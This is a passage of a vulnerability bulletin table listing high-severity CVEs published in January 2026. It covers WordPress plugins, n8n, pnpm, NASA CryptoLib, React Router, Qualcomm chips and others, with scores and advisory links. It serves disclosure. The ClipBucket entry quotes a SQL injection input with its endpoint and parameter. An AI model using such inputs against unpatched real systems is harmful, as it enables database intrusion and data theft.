| jwsthemes--FreeAgent | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in jwsthemes FreeAgent allows PHP Local File Inclusion. This issue affects FreeAgent: from n/a through 2.1.2. | 2026-01-05 | 8.1 | CVE-2025-69087 | https://vdp.patchstack.com/database/wordpress/theme/freeagent/vulnerability/wordpress-freeagent-theme-2-1-2-local-file-inclusion-vulnerability?_s_id=cve |
| Jwsthemes--Issabella | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Jwsthemes Issabella allows PHP Local File Inclusion. This issue affects Issabella: from n/a through 1.1.2. | 2026-01-06 | 8.1 | CVE-2025-69086 | https://patchstack.com/database/wordpress/theme/issabella/vulnerability/wordpress-issabella-theme-1-1-2-local-file-inclusion-vulnerability?_s_id=cve |
| kanboard--kanboard | Kanboard is project management software focused on Kanban methodology. Versions 1.2.48 and below are vulnerable to a critical authentication bypass when REVERSE_PROXY_AUTH is enabled. The application blindly trusts HTTP headers for user authentication without verifying the request originated from a trusted reverse proxy. An attacker can impersonate any user, including administrators, by simply sending a spoofed HTTP header. This issue is fixed in version 1.2.49. | 2026-01-08 | 9.1 | CVE-2026-21881 | https://github.com/kanboard/kanboard/security/advisories/GHSA-wwpf-3j4p-739w https://github.com/kanboard/kanboard/commit/7af6143e2ad25b5c15549cca8af4341c7ac4e2fc https://github.com/kanboard/kanboard/releases/tag/v1.2.49 |
| KlbTheme--Machic Core | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in KlbTheme Machic Core allows DOM-Based XSS. This issue affects Machic Core: from n/a through 1.2.6. | 2026-01-05 | 7.1 | CVE-2023-49186 | https://vdp.patchstack.com/database/wordpress/plugin/machic-core/vulnerability/wordpress-machic-core-plugin-1-2-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| loopus--WP Cost Estimation & Payment Forms Builder | The WP Cost Estimation plugin for WordPress is vulnerable to arbitrary file uploads and deletion due to missing file type validation in the lfb_upload_form and lfb_removeFile AJAX actions in versions up to, and including, 9.642. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server, which may make remote code execution possible. Additionally, the attacker can also delete files on the server such as database configuration files, subsequently uploading their own database files. | 2026-01-08 | 9.8 | CVE-2019-25296 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ae50aa5d-95e3-4650-9dbf-118b4ba3abda?source=cve https://www.wordfence.com/blog/2019/02/vulnerabilities-patched-in-wp-cost-estimation-plugin/ https://www.zdnet.com/article/another-wordpress-commercial-plugin-gets-exploited-in-the-wild/ https://wpscan.com/vulnerability/9219 https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wp-cost-estimation-payment-forms-builder-multiple-vulnerabilities-9-642/ |
| MacWarrior--clipbucket-v5 | ClipBucket v5 is an open source video sharing platform. Versions 5.5.2-#187 and below allow an attacker to perform Blind SQL Injection through the add comment section within a channel. When adding a comment within a channel, there is a POST request to the /actions/ajax.php endpoint. The obj_id parameter within the POST request to /actions/ajax.php is then used within the user_exists function of the upload/includes/classes/user.class.php file as the $id parameter. It is then used within the count function of the upload/includes/classes/db.class.php file. The $id parameter is concatenated into the query without validation or sanitization, and a user-supplied input like 1' or 1=1-- - can be used to trigger the injection. This issue does not have a fix at the time of publication. | 2026-01-07 | 9.8 | CVE-2026-21875 | https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-crpv-fmc4-j392 |
| Marketing Fire LLC--LoginWP - Pro | Missing Authorization vulnerability in Marketing Fire LLC LoginWP - Pro allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects LoginWP - Pro: from n/a through 4.0.8.5. | 2026-01-05 | 7.5 | CVE-2025-46255 | https://vdp.patchstack.com/database/wordpress/plugin/loginwp-pro/vulnerability/wordpress-loginwp-pro-plugin-4-0-8-5-settings-change-vulnerability?_s_id=cve |
| Meow Apps--Media File Renamer | Unrestricted Upload of File with Dangerous Type vulnerability in Meow Apps Media File Renamer allows Using Malicious Files. This issue affects Media File Renamer: from n/a through 5.7.7. | 2026-01-05 | 9.1 | CVE-2023-50897 | https://vdp.patchstack.com/database/wordpress/plugin/media-file-renamer/vulnerability/wordpress-media-file-renamer-plugin-5-7-7-arbitrary-file-rename-lead-to-rce-vulnerability?_s_id=cve |
| Mojoomla--WPCHURCH | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mojoomla WPCHURCH allows Blind SQL Injection. This issue affects WPCHURCH: from n/a through 2.7.0. | 2026-01-07 | 9.3 | CVE-2025-32303 | https://patchstack.com/database/wordpress/plugin/church-management/vulnerability/wordpress-wpchurch-2-7-0-sql-injection-vulnerability?_s_id=cve |
| Mojoomla--WPCHURCH | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mojoomla WPCHURCH allows PHP Local File Inclusion. This issue affects WPCHURCH: from n/a through 2.7.0. | 2026-01-06 | 8.1 | CVE-2025-32304 | https://patchstack.com/database/wordpress/plugin/church-management/vulnerability/wordpress-wpchurch-plugin-2-7-0-local-file-inclusion-vulnerability?_s_id=cve |
| moneyspace--Money Space | The MoneySpace plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.13.9. This is due to the plugin storing full payment card details (PAN, card holder name, expiry month/year, and CVV) in WordPress post_meta using base64_encode(), and then embedding these values into the publicly accessible mspaylink page's inline JavaScript without any authentication or authorization check. This makes it possible for unauthenticated attackers who know or can guess an order_id to access the mspaylink endpoint and retrieve full credit card numbers and CVV codes directly from the HTML/JS response, constituting a severe PCI-DSS violation. | 2026-01-07 | 8.6 | CVE-2025-13371 | https://www.wordfence.com/threat-intel/vulnerabilities/id/77db827d-9afd-4b59-b0ad-1ad562634c52?source=cve https://github.com/MoneySpace-net/money-space-for-Woocommerce/blob/e79d96cfc1b12cece15c6f0b309045403cc6a9d2/view/mspaylink.php#L164 https://plugins.trac.wordpress.org/browser/money-space/trunk/view/mspaylink.php#L232 https://plugins.trac.wordpress.org/browser/money-space/tags/2.13.9/view/mspaylink.php#L232 https://github.com/MoneySpace-net/money-space-for-Woocommerce/blob/e79d96cfc1b12cece15c6f0b309045403cc6a9d2/view/mspaylink.php#L232 |
| n/a--GNU Wget2 | A security issue was discovered in GNU Wget2 when handling Metalink documents. The application fails to properly validate file paths provided in Metalink <file name> elements. An attacker can abuse this behavior to write files to unintended locations on the system. This can lead to data loss or potentially allow further compromise of the user's environment. | 2026-01-09 | 8.8 | CVE-2025-69194 | https://access.redhat.com/security/cve/CVE-2025-69194 RHBZ#2425773 |
| n/a--GNU Wget2 | A flaw was found in GNU Wget2. This vulnerability, a stack-based buffer overflow, occurs in the filename sanitization logic when processing attacker-controlled URL paths, particularly when filename restriction options are active. A remote attacker can exploit this by providing a specially crafted URL, which, upon user interaction with wget2, can lead to memory corruption. This can cause the application to crash and potentially allow for further malicious activities. | 2026-01-09 | 7.6 | CVE-2025-69195 | https://access.redhat.com/security/cve/CVE-2025-69195 RHBZ#2425770 |
| n8n-io--n8n | n8n is an open source workflow automation platform. Versions starting with 1.65.0 and below 1.121.0 enable an attacker to access files on the underlying server through execution of certain form-based workflows. A vulnerable workflow could grant access to an unauthenticated remote attacker, resulting in exposure of sensitive information stored on the system and may enable further compromise depending on deployment configuration and workflow usage. This issue is fixed in version 1.121.0. | 2026-01-07 | 10 | CVE-2026-21858 | https://github.com/n8n-io/n8n/security/advisories/GHSA-v4pr-fm98-w9pg |
| n8n-io--n8n | n8n is an open source workflow automation platform. In versions 0.121.2 and below, an authenticated attacker may be able to execute malicious code using the n8n service. This could result in full compromise and can impact both self-hosted and n8n Cloud instances. This issue is fixed in version 1.121.3. Administrators can reduce exposure by disabling the Git node and limiting access for untrusted users, but upgrading to the latest version is recommended. | 2026-01-08 | 10 | CVE-2026-21877 | https://github.com/n8n-io/n8n/security/advisories/GHSA-v364-rw7m-3263 https://github.com/n8n-io/n8n/commit/f4b009d00d1f4ba9359b8e8f1c071e3d910a55f6 |
| nasa--CryptoLib | CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, the Crypto_AOS_ProcessSecurity function reads memory without valid bounds checking when parsing AOS frame hashes. This issue has been patched in version 1.4.3. | 2026-01-10 | 8.2 | CVE-2026-21898 | https://github.com/nasa/CryptoLib/security/advisories/GHSA-7ch6-2pmg-m853 https://github.com/nasa/CryptoLib/releases/tag/v1.4.3 |
| nasa--CryptoLib | CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, the Crypto_Config_Add_Gvcid_Managed_Parameters function only checks whether gvcid_counter > GVCID_MAN_PARAM_SIZE. As a result, it allows up to the 251st entry, which causes a write past the end of the array, overwriting gvcid_counter located immediately after gvcid_managed_parameters_array[250]. This leads to an out-of-bounds write, and the overwritten gvcid_counter may become an arbitrary value, potentially affecting the parameter lookup/registration logic that relies on it. This issue has been patched in version 1.4.3. | 2026-01-10 | 7.3 | CVE-2026-21897 | https://github.com/nasa/CryptoLib/security/advisories/GHSA-9x7j-gx23-7m5r https://github.com/nasa/CryptoLib/releases/tag/v1.4.3 |
| nasa--CryptoLib | CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, CryptoLib's KMC crypto service integration is vulnerable to a heap buffer overflow when decoding Base64-encoded ciphertext/cleartext fields returned by the KMC service. The decode destination buffer is sized using an expected output length (len_data_out), but the Base64 decoder writes output based on the actual Base64 input length and does not enforce any destination size limit. An oversized Base64 string in the KMC JSON response can cause out-of-bounds writes on the heap, resulting in process crash and potentially code execution under certain conditions. This issue has been patched in version 1.4.3. | 2026-01-10 | 7.5 | CVE-2026-22697 | https://github.com/nasa/CryptoLib/security/advisories/GHSA-qjx3-83jh-2jc4 https://github.com/nasa/CryptoLib/releases/tag/v1.4.3 |
| neeraj_slit--Brevo for WooCommerce | The Brevo for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'user_connection_id' parameter in all versions up to, and including, 4.0.49 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-08 | 7.2 | CVE-2025-14436 | https://www.wordfence.com/threat-intel/vulnerabilities/id/670f4e26-75c9-40cd-8088-2fa4c40f6feb?source=cve https://plugins.trac.wordpress.org/browser/woocommerce-sendinblue-newsletter-subscription/trunk/woocommerce-sendinblue.php#L164 https://plugins.trac.wordpress.org/browser/woocommerce-sendinblue-newsletter-subscription/trunk/woocommerce-sendinblue.php#L171 https://plugins.trac.wordpress.org/browser/woocommerce-sendinblue-newsletter-subscription/trunk/woocommerce-sendinblue.php#L188 https://plugins.trac.wordpress.org/browser/woocommerce-sendinblue-newsletter-subscription/trunk/src/managers/admin-manager.php#L59 https://plugins.trac.wordpress.org/browser/woocommerce-sendinblue-newsletter-subscription/trunk/src/views/admin_menus.php#L728 https://plugins.trac.wordpress.org/changeset/3434903/woocommerce-sendinblue-newsletter-subscription |
| NREL--BEopt | NREL BEopt 2.8.0.0 contains a DLL hijacking vulnerability that allows attackers to load arbitrary libraries by tricking users into opening application files from remote shares. Attackers can exploit insecure library loading of sdl2.dll and libegl.dll by placing malicious libraries on WebDAV or SMB shares to execute unauthorized code. | 2026-01-07 | 9.8 | CVE-2019-25268 | Zero Science Lab Vulnerability Advisory Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing IBM X-Force Vulnerability Exchange BEopt Product Homepage |
| opajaap--WP Photo Album Plus | The WP Photo Album Plus plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'shortcode' parameter in all versions up to, and including, 9.1.05.008 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-07 | 7.1 | CVE-2025-14835 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0903521d-3b07-4539-97c9-15e6bbe2cc2e?source=cve https://plugins.trac.wordpress.org/browser/wp-photo-album-plus/tags/9.1.05.004/wppa-ajax.php#L43 https://plugins.trac.wordpress.org/browser/wp-photo-album-plus/tags/9.1.05.004/wppa-ajax.php#L1130 https://plugins.trac.wordpress.org/browser/wp-photo-album-plus/tags/9.1.05.004/wppa-filter.php#L125 https://plugins.trac.wordpress.org/browser/wp-photo-album-plus/tags/9.1.05.004/wppa-functions.php#L5617 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3427638%40wp-photo-album-plus%2Ftrunk&old=3426267%40wp-photo-album-plus%2Ftrunk&sfp_email=&sfph_mail= |
| OpenCTI-Platform--opencti | OpenCTI is an open source platform for managing cyber threat intelligence knowledge and observables. Prior to version 6.8.1, the GraphQL mutation "WorkspacePopoverDeletionMutation" allows users to delete workspace-related objects such as dashboards and investigation cases. However, the mutation lacks proper authorization checks to verify ownership of the targeted resources. An attacker can exploit this by supplying an active UUID of another user. Since the API does not validate whether the requester owns the resource, the mutation executes successfully, resulting in unauthorized deletion of the entire workspace. Version 6.8.1 fixes the issue. | 2026-01-05 | 7.1 | CVE-2025-61781 | https://github.com/OpenCTI-Platform/opencti/security/advisories/GHSA-pr6m-q4g7-342c |
| OPEXUS--eCASE Audit | OPEXUS eCASE Audit allows an authenticated attacker to modify client-side JavaScript or craft HTTP requests to access functions or buttons that have been disabled or blocked by an administrator. Fixed in eCASE Platform 11.14.1.0. | 2026-01-08 | 7.6 | CVE-2026-22230 | |
| OPEXUS--eCase Portal | OPEXUS eCasePortal before version 9.0.45.0 allows an unauthenticated attacker to navigate to the 'Attachments.aspx' endpoint, iterate through predictable values of 'formid', and download or delete all user-uploaded files, or upload new files. | 2026-01-08 | 9.8 | CVE-2026-22234 | |
| OPEXUS--eComplaint | OPEXUS eComplaint before version 9.0.45.0 allows an attacker to visit the 'DocumentOpen.aspx' endpoint, iterate through predictable values of 'chargeNumber', and download any uploaded files. | 2026-01-08 | 7.5 | CVE-2026-22235 | |
| opf--openproject | OpenProject is an open-source, web-based project management software. A Local File Read (LFR) vulnerability exists in the work package PDF export functionality of OpenProject prior to version 16.6.4. By uploading a specially crafted SVG file (disguised as a PNG) as a work package attachment, an attacker can exploit the backend image processing engine (ImageMagick). When the work package is exported to PDF, the backend attempts to resize the image, triggering the ImageMagick text: coder. This allows an attacker to read arbitrary local files that the application user has permissions to access (e.g., /etc/passwd, all project configuration files, private project data, etc.). The attack requires permissions to upload attachments to a container that can be exported to PDF, such as a work package. The issue has been patched in version 16.6.4. Those who are unable to upgrade may apply the patch manually. | 2026-01-10 | 9.1 | CVE-2026-22600 | https://github.com/opf/openproject/security/advisories/GHSA-m8f2-cwpq-vvhh https://github.com/opf/openproject/releases/tag/v16.6.4 |
| Plexus--Plexus anblick Digital Signage Management | Plexus anblick Digital Signage Management 3.1.13 contains an open redirect vulnerability in the 'PantallaLogin' script that allows attackers to manipulate the 'pagina' GET parameter. Attackers can craft malicious links that redirect users to arbitrary websites by exploiting improper input validation in the parameter. | 2026-01-06 | 9.8 | CVE-2020-36912 | Zero Science Lab Disclosure (ZSL-2020-5573) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange Entry Plexus Vendor Homepage VulnCheck Advisory: Plexus anblick Digital Signage Management 3.1.13 Open Redirect via Pagina Parameter |
| pnpm--pnpm | pnpm is a package manager. Versions 10.0.0 through 10.25 allow git-hosted dependencies to execute arbitrary code during pnpm install, circumventing the v10 security feature "Dependency lifecycle scripts execution disabled by default". While pnpm v10 blocks postinstall scripts via the onlyBuiltDependencies mechanism, git dependencies can still execute prepare, prepublish, and prepack scripts during the fetch phase, enabling remote code execution without user consent or approval. This issue is fixed in version 10.26.0. | 2026-01-07 | 8.8 | CVE-2025-69264 | https://github.com/pnpm/pnpm/security/advisories/GHSA-379q-355j-w6rj https://github.com/pnpm/pnpm/commit/73cc63504d9bc360c43e4b2feb9080677f03c5b5 |
| pnpm--pnpm | pnpm is a package manager. Versions 6.25.0 through 10.26.2 have a Command Injection vulnerability when using environment variable substitution in .npmrc configuration files with tokenHelper settings. An attacker who can control environment variables during pnpm operations could achieve Remote Code Execution (RCE) in build environments. This issue is fixed in version 10.27.0. | 2026-01-07 | 7.6 | CVE-2025-69262 | https://github.com/pnpm/pnpm/security/advisories/GHSA-2phv-j68v-wwqx https://github.com/pnpm/pnpm/releases/tag/v10.27.0 |
| pnpm--pnpm | pnpm is a package manager. Versions 10.26.2 and below store HTTP tarball dependencies (and git-hosted tarballs) in the lockfile without integrity hashes. This allows the remote server to serve different content on each install, even when a lockfile is committed. An attacker who publishes a package with an HTTP tarball dependency can serve different code to different users or CI/CD environments. The attack requires the victim to install a package that has an HTTP/git tarball in its dependency tree. The victim's lockfile provides no protection. This issue is fixed in version 10.26.0. | 2026-01-07 | 7.5 | CVE-2025-69263 | https://github.com/pnpm/pnpm/security/advisories/GHSA-7vhp-vf5g-r2fw https://github.com/pnpm/pnpm/commit/0958027f88a99ccefe7e9676cdebba393dfbdc85 |
| Pro-Bravia--Sony BRAVIA Digital Signage | Sony BRAVIA Digital Signage 1.7.8 contains an information disclosure vulnerability that allows unauthenticated attackers to access sensitive system details through API endpoints. Attackers can retrieve network interface information, server configurations, and system metadata by sending requests to the exposed system API. | 2026-01-06 | 7.5 | CVE-2020-36922 | ExploitDB-49187 Sony BRAVIA Digital Signage Official Homepage BRAVIA Signage Software Resources Sony Professional Display Software Product Page Zero Science Lab Disclosure (ZSL-2020-5610) Packet Storm Security Exploit Entry CXSecurity Vulnerability Database IBM X-Force Vulnerability Exchange VulnCheck Advisory: Sony BRAVIA Digital Signage 1.7.8 Unauthenticated System API Information Disclosure |
| Pro-Bravia--Sony BRAVIA Digital Signage | Sony BRAVIA Digital Signage 1.7.8 contains a remote file inclusion vulnerability that allows attackers to inject arbitrary client-side scripts through the content material URL parameter. Attackers can exploit this vulnerability to hijack user sessions, execute cross-site scripting code, and modify display content by manipulating the input material type. | 2026-01-06 | 7.5 | CVE-2020-36924 | ExploitDB-49186 Sony BRAVIA Digital Signage Product Homepage BRAVIA Signage Software Resources Sony Professional Display Software Product Page Zero Science Lab Disclosure (ZSL-2020-5612) Packet Storm Security Exploit Archive IBM X-Force Exchange Vulnerability Entry CXSecurity Vulnerability Listing VulnCheck Advisory: Sony BRAVIA Digital Signage 1.7.8 Unauthenticated Remote File Inclusion |
| projectworlds--House Rental and Property Listing | A flaw has been found in projectworlds House Rental and Property Listing 1.0. Impacted is an unknown function of the file /app/register.php?action=reg of the component Signup. This manipulation of the argument image causes unrestricted upload. Remote exploitation of the attack is possible. The exploit has been published and may be used. | 2026-01-06 | 7.3 | CVE-2026-0643 | VDB-339686 \| projectworlds House Rental and Property Listing Signup register.php unrestricted upload VDB-339686 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #732563 \| projectworlds.com rental And Property Listing Project V1.0 File unrestricted upload https://github.com/1uzpk/cve/issues/4 |
| Qualcomm, Inc.--Snapdragon | Cryptographic issue may occur while encrypting license data. | 2026-01-06 | 8.4 | CVE-2025-47345 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while deinitializing a HDCP session. | 2026-01-06 | 7.8 | CVE-2025-47339 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing a video session to set video parameters. | 2026-01-06 | 7.8 | CVE-2025-47343 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing a secure logging command in the trusted application. | 2026-01-06 | 7.8 | CVE-2025-47346 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing identity credential operations in the trusted application. | 2026-01-06 | 7.8 | CVE-2025-47348 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when multiple threads concurrently access and modify shared resources. | 2026-01-06 | 7.8 | CVE-2025-47356 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while preprocessing IOCTLs in sensors. | 2026-01-06 | 7.8 | CVE-2025-47380 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while passing pages to DSP with an unaligned starting address. | 2026-01-06 | 7.8 | CVE-2025-47388 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption when accessing resources in kernel driver. | 2026-01-06 | 7.8 | CVE-2025-47393 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption when copying overlapping buffers during memory operations due to incorrect offset calculations. | 2026-01-06 | 7.8 | CVE-2025-47394 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption occurs when a secure application is launched on a device with insufficient memory. | 2026-01-06 | 7.8 | CVE-2025-47396 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Quanta Computer--QOCA aim AI Medical Cloud Platform | QOCA aim AI Medical Cloud Platform developed by Quanta Computer has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server. | 2026-01-05 | 8.8 | CVE-2025-15240 | https://www.twcert.org.tw/tw/cp-132-10615-157a3-1.html https://www.twcert.org.tw/en/cp-139-10616-cd942-2.html |
| quickjs-ng--quickjs | A vulnerability was determined in quickjs-ng quickjs up to 0.11.0. This vulnerability affects the function js_typed_array_constructor of the file quickjs.c. Executing a manipulation can lead to heap-based buffer overflow. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. This patch is called c5d80831e51e48a83eab16ea867be87f091783c5. A patch should be applied to remediate this issue. | 2026-01-10 | 7.3 | CVE-2026-0821 | VDB-340355 \| quickjs-ng quickjs quickjs.c js_typed_array_constructor heap-based overflow VDB-340355 \| CTI Indicators (IOB, IOC, IOA) Submit #731780 \| quickjs-ng quickjs v0.11.0 Heap-based Buffer Overflow https://github.com/quickjs-ng/quickjs/issues/1296 https://github.com/quickjs-ng/quickjs/pull/1299 https://github.com/quickjs-ng/quickjs/issues/1296#issue-3780003395 https://github.com/quickjs-ng/quickjs/commit/c5d80831e51e48a83eab16ea867be87f091783c5 |
| Red Hat--Red Hat Ansible Automation Platform 2.5 for RHEL 8 | A flaw was found in Ansible Automation Platform (AAP). Read-only scoped OAuth2 API Tokens in AAP are enforced at the Gateway level for Gateway-specific operations. However, this vulnerability allows read-only tokens to perform write operations on backend services (e.g., Controller, Hub, EDA). If this flaw were exploited, an attacker's capabilities would only be limited by role-based access controls (RBAC). | 2026-01-08 | 8.5 | CVE-2025-14025 | https://access.redhat.com/articles/7136004 RHSA-2026:0360 RHSA-2026:0361 RHSA-2026:0408 RHSA-2026:0409 https://access.redhat.com/security/cve/CVE-2025-14025 RHBZ#2418785 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was identified in the NTLM authentication handling of the libsoup HTTP library, used by GNOME and other applications for network communication. When processing extremely long passwords, an internal size calculation can overflow due to improper use of signed integers. This results in incorrect memory allocation on the stack, followed by unsafe memory copying. As a result, applications using libsoup may crash unexpectedly, creating a denial-of-service risk. | 2026-01-08 | 7.5 | CVE-2026-0719 | https://access.redhat.com/security/cve/CVE-2026-0719 RHBZ#2427906 https://gitlab.gnome.org/GNOME/libsoup/-/issues/477 |
| Red Hat--Red Hat JBoss Enterprise Application Platform 8.1 | A flaw was found in the Undertow HTTP server core, which is used in WildFly, JBoss EAP, and other Java applications. The Undertow library fails to properly validate the Host header in incoming HTTP requests. As a result, requests containing malformed or malicious Host headers are processed without rejection, enabling attackers to poison caches, perform internal network scans, or hijack user sessions. | 2026-01-07 | 9.6 | CVE-2025-12543 | RHSA-2026:0383 RHSA-2026:0384 RHSA-2026:0386 https://access.redhat.com/security/cve/CVE-2025-12543 RHBZ#2408784 |
| RED--RED-V Super Digital Signage System RXV-A740R | RED-V Super Digital Signage System 5.1.1 contains an information disclosure vulnerability that allows unauthenticated attackers to access sensitive webserver log files. Attackers can visit multiple endpoints to retrieve system resources and debug log information without authentication. | 2026-01-06 | 7.5 | CVE-2020-36921 | Zero Science Lab Disclosure (ZSL-2020-5609) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange CXSecurity Vulnerability Database RED-V Vendor Homepage VulnCheck Advisory: RED-V Super Digital Signage System 5.1.1 Log Information Disclosure Vulnerability |
| remix-run--react-router | React Router is a router for React. In @react-router/node versions 7.0.0 through 7.9.3, @remix-run/deno prior to version 2.17.2, and @remix-run/node prior to version 2.17.2, if createFileSessionStorage() is being used from @react-router/node (or @remix-run/node/@remix-run/deno in Remix v2) with an unsigned cookie, it is possible for an attacker to cause the session to try to read/write from a location outside the specified session file directory. The success of the attack would depend on the permissions of the web server process to access those files. Read files cannot be returned directly to the attacker. Session file reads would only succeed if the file matched the expected session file format. If the file matched the session file format, the data would be populated into the server side session but not directly returned to the attacker unless the application logic returned specific session information. This issue has been patched in @react-router/node version 7.9.4, @remix-run/deno version 2.17.2, and @remix-run/node version 2.17.2. | 2026-01-10 | 9.1 | CVE-2025-61686 | https://github.com/remix-run/react-router/security/advisories/GHSA-9583-h5hc-x8cw |
| remix-run--react-router | React Router is a router for React. In @remix-run/react version prior to 2.17.3. and react-router 7.0.0 through 7.11.0, a XSS vulnerability exists in in React Router's <ScrollRestoration> API in Framework Mode when using the getKey/storageKey props during Server-Side Rendering which could allow arbitrary JavaScript execution during SSR if untrusted content is used to generate the keys. There is no impact if server-side rendering in Framework Mode is disabled, or if Declarative Mode (<BrowserRouter>) or Data Mode (createBrowserRouter/<RouterProvider>) is being used. This issue has been patched in @remix-run/react version 2.17.3 and react-router version 7.12.0. | 2026-01-10 | 8.2 | CVE-2026-21884 | https://github.com/remix-run/react-router/security/advisories/GHSA-8v8x-cx79-35w7 |
| remix-run--react-router | React Router is a router for React. In @remix-run/router versions prior to 1.23.2 and react-router 7.0.0 through 7.11.0, React Router (and Remix v1/v2) SPA open navigation redirects originating from loaders or actions in Framework Mode, Data Mode, or the unstable RSC modes can result in unsafe URLs causing unintended JavaScript execution on the client. This is only an issue if you are creating redirect paths from untrusted content or via an open redirect. There is no impact if Declarative Mode (<BrowserRouter>) is being used. This issue has been patched in @remix-run/router version 1.23.2 and react-router version 7.12.0. | 2026-01-10 | 8 | CVE-2026-22029 | https://github.com/remix-run/react-router/security/advisories/GHSA-2w69-qvjg-hvjx |
| remix-run--react-router | React Router is a router for React. In @remix-run/react versions 1.15.0 through 2.17.0 and react-router versions 7.0.0 through 7.8.2, an XSS vulnerability exists in React Router's meta()/<Meta> APIs in Framework Mode when generating script:ld+json tags, which could allow arbitrary JavaScript execution during SSR if untrusted content is used to generate the tag. There is no impact if the application is being used in Declarative Mode (<BrowserRouter>) or Data Mode (createBrowserRouter/<RouterProvider>). This issue has been patched in @remix-run/react version 2.17.1 and react-router version 7.9.0. | 2026-01-10 | 7.6 | CVE-2025-59057 | https://github.com/remix-run/react-router/security/advisories/GHSA-3cgp-3xvw-98x8 |
| Rustaurius--Five Star Restaurant Reservations | Authorization Bypass Through User-Controlled Key vulnerability in Rustaurius Five Star Restaurant Reservations allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Five Star Restaurant Reservations: from n/a through 2.7.8. | 2026-01-05 | 8.6 | CVE-2025-68044 | https://vdp.patchstack.com/database/wordpress/plugin/restaurant-reservations/vulnerability/wordpress-five-star-restaurant-reservations-plugin-2-7-7-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| RustCrypto--elliptic-curves | RustCrypto: Elliptic Curves is general purpose Elliptic Curve Cryptography (ECC) support, including types and traits for representing various elliptic curve forms, scalars, points, and public/secret keys composed thereof. In versions 0.14.0-pre.0 and 0.14.0-rc.0, a denial-of-service vulnerability exists in the SM2 PKE decryption path where an invalid elliptic-curve point (C1) is decoded and the resulting value is unwrapped without checking. Specifically, AffinePoint::from_encoded_point(&encoded_c1) may return a None/CtOption::None when the supplied coordinates are syntactically valid but do not lie on the SM2 curve. The calling code previously used .unwrap(), causing a panic when presented with such input. This issue has been patched via commit 085b7be. | 2026-01-10 | 7.5 | CVE-2026-22699 | https://github.com/RustCrypto/elliptic-curves/security/advisories/GHSA-78p6-6878-8mj6 https://github.com/RustCrypto/elliptic-curves/pull/1602 https://github.com/RustCrypto/elliptic-curves/commit/085b7bee647029bd189e1375203418205006bcab |
